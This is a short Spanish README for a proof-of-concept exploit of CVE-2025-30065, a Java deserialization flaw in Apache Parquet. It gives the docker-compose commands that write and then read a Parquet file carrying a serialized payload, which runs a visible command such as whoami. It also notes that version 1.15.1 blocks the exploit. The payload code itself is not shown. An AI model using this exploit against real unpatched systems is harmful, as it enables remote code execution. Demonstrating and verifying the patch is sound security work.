
PoC
Este proyecto demuestra una prueba de concepto segura para CVE-2025-30065 utilizando Apache Parquet y deserialización Java.
Cuando se lee un archivo Parquet que contiene un objeto Java serializado, el payload ejecuta un comando visible para demostrar la ejecución de código.
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadWriter
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadReader
Deberías ver algo como:
[👀 salida del payload] {salida de whoami}
Intenta cambiar el número de versión a 1.15.1 desde la vulnerable <1.15.0 en /app/pom.xml. Ya no funcionará.